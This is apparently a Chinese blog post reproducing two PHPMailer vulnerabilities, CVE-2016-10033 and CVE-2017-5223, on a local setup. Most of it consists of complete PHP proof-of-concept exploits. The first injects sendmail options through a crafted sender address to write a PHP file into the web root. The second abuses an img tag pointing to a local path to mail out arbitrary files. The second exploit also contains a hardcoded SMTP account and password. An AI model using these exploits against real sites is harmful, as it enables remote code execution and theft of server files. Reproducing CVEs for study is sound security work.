今天在thinkphp官网闲逛,无意下载了一套eduaskcms,查看了一下libs目录中居然存在PHPMailer-5.2.13,想起了之前看到的PHPMailer的漏洞,可惜这套CMS只提供了一个邮箱接口,前台页面需要单独自己写,没办法用这套CMS进行复现,这边也顺便利用这个PHPMailer-5.2.13对CVE-2016-10033和CVE-2017-5223进行本地复现,记录一下。
PHPMailer 命令执行漏洞(CVE-2016-10033)
漏洞编号:CVE-2016-10033
影响版本:PHPMailer< 5.2.18
漏洞级别: 高危
漏洞POC:
<?php /* PHPMailer < 5.2.18 Remote Code Execution (CVE-2016-10033) A simple PoC (working on Sendmail MTA) It will inject the following parameters to sendmail command: Arg no. 0 == [/usr/sbin/sendmail] Arg no. 1 == [-t] Arg no. 2 == [-i] Arg no. 3 == [-fattacker\] Arg no. 4 == [-oQ/tmp/] Arg no. 5 == [-X/var/www/cache/phpcode.php] Arg no. 6 == [some"@email.com] which will write the transfer log (-X) into /var/www/cache/phpcode.php file. The resulting file will contain the payload passed in the body of the msg: 09607 <<< --b1_cb4566aa51be9f090d9419163e492306 09607 <<< Content-Type: text/html; charset=us-ascii 09607 <<< 09607 <<< <?php phpinfo(); ?> 09607 <<< 09607 <<< 09607 <<< 09607 <<< --b1_cb4566aa51be9f090d9419163e492306-- See the full advisory URL for details. */ // Attacker‘s input coming from untrusted source such as $_GET , $_POST etc. // For example from a Contact form $email_from = ‘"attacker\" -oQ/tmp/ -X/var/www/cache/phpcode.php some"@email.com‘; $msg_body = "<?php phpinfo(); ?>"; // ------------------ // mail() param injection via the vulnerability in PHPMailer require_once(‘class.phpmailer.php‘); $mail = new PHPMailer(); // defaults to using php "mail()" $mail->SetFrom($email_from, ‘Client Name‘); $address = "[email protected]"; $mail->AddAddress($address, "Some User"); $mail->Subject = "PHPMailer PoC Exploit CVE-2016-10033"; $mail->MsgHTML($msg_body); if(!$mail->Send()) { echo "Mailer Error: " . $mail->ErrorInfo; } else { echo "Message sent!\n"; }
PHPMailer任意文件读取漏洞分析(CVE-2017-5223)
漏洞编号: CVE-2017-5223
影响版本: PHPMailer <= 5.2.21
漏洞级别: 高危
漏洞POC:根据作者的POC改了几行,使其适用于qq邮箱
<?php #Author:Yxlink require_once(‘PHPMailerAutoload.php‘); $mail = new PHPMailer(); $mail->isSMTP(); $mail->Host = ‘smtp.qq.com‘; $mail->Port = 465; $mail->SMTPAuth = true; $mail->Username = [email protected]‘; $mail->Password = ‘zsuhxbmsaioxbcgaq‘; $mail->SMTPSecure = ‘ssl‘; $mail->CharSet = "UTF-8"; $mail->Encoding = "base64"; $mail->Subject = "hello"; $mail->From = "[email protected]"; $mail->FromName = "test"; $address = "[email protected]"; $mail->AddAddress($address, "test"); $mail->AddAttachment(‘test.txt‘,‘test.txt‘); $mail->IsHTML(true); $msg="<img src=‘D:\\1.txt‘>test"; $mail->msgHTML($msg); if(!$mail->Send()) { echo "Mailer Error: " . $mail->ErrorInfo; } else { echo "Message sent!"; } ?>
参考文章:
PHPMailer任意文件读取漏洞分析(CVE-2017-5223)http://www.freebuf.com/vuls/124820.html
PHPMailer 命令执行漏洞(CVE-2016-10033)分析 http://blog.csdn.net/wyvbboy/article/details/53969278